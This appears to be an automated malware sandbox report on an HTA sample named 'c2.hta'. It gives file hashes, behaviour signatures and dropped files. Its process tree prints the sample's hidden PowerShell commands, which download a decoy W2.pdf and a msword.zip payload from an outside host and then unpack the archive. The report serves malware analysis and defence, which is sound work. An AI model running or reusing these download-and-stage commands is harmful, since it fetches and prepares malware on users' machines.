Overview

overview

10

Static

static

1

c2.hta

windows7-x64

8

c2.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    04-01-2025 23:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c2.hta

  • Size

    3KB

  • MD5

    7073f58529ffe4c0fd8e3f52d2ad9f34

  • SHA1

    0dfad96f16f35302ce6a60601e549054147261ca

  • SHA256

    ad362498e8b482fc0456d78468114628cfbade5a36d186af5bbb6ba35431c50c

  • SHA512

    5fa65856eef202f2eae1509558bd3cd290e918645c991481041c48f5644bc897ea734aec3f01b533dc649087f8874e48fec2cfce1efa4aa83b0e5e7947541c8a

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\c2.hta"
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\temp.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\Admin\Downloads\W2.pdf"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3060
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\Admin\AppData\Local\Temp\msword.zip"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2904
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\msword -Force"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\cleanup.bat"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 10
        3⤵
        • System Location Discovery: System Language Discovery
        • Delays execution with timeout.exe
        PID:784

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\CabAC39.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarAC6A.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\cleanup.bat
    Filesize

    170B

    MD5

    63673ea7bc3c3ceb411c3d8b3815c74e

    SHA1

    be80cd9fdbd85d2288faa1d6f52ab5d3e7351864

    SHA256

    411864785adc0d1555e58724ff0c710c1b9758e93c6d816c6a1b7b04728c5a0b

    SHA512

    68d6496b608df962942ac1f9af1fdbe2223b7540d1ec3f293281f184d5fc96e0e6c4baa001a452a66d20684e8ca0148c0abf027a4d051262df42b24b3222cea5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\temp.bat
    Filesize

    498B

    MD5

    e8dfdb915a523a09e139aaa900991ddd

    SHA1

    d23f4798c549bfb7ddd968c4c2a971f67468a662

    SHA256

    91619737b3f7af4623dc62b4f3df7b551337ec94f693a3b9ba35bb231483393e

    SHA512

    b4e737d1c80420688bf856df02a580b691d120307b7d31ea4766448ccd0c6eec7b2c48424691e92dffba58ca8c9a8df989f5b683d9363cac37d3dd3e5ad1623e

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    95a84b4bed9087ea25bc4374da9da061

    SHA1

    a758037e2a23fe60aadab1139947eed75c0e0b8e

    SHA256

    eb405a49dd56050611cfdeb1188f947af928049a4a4d9a1c7b55298669c95810

    SHA512

    9e561b6f74390b5d076e2af195625ff062c0f20734bf4865a4d5bff33861605b7df50355a531a0d5b1a7fe0257fa895ab3b7f494eb15e003b603d1b5576bb5b8

    Download Submit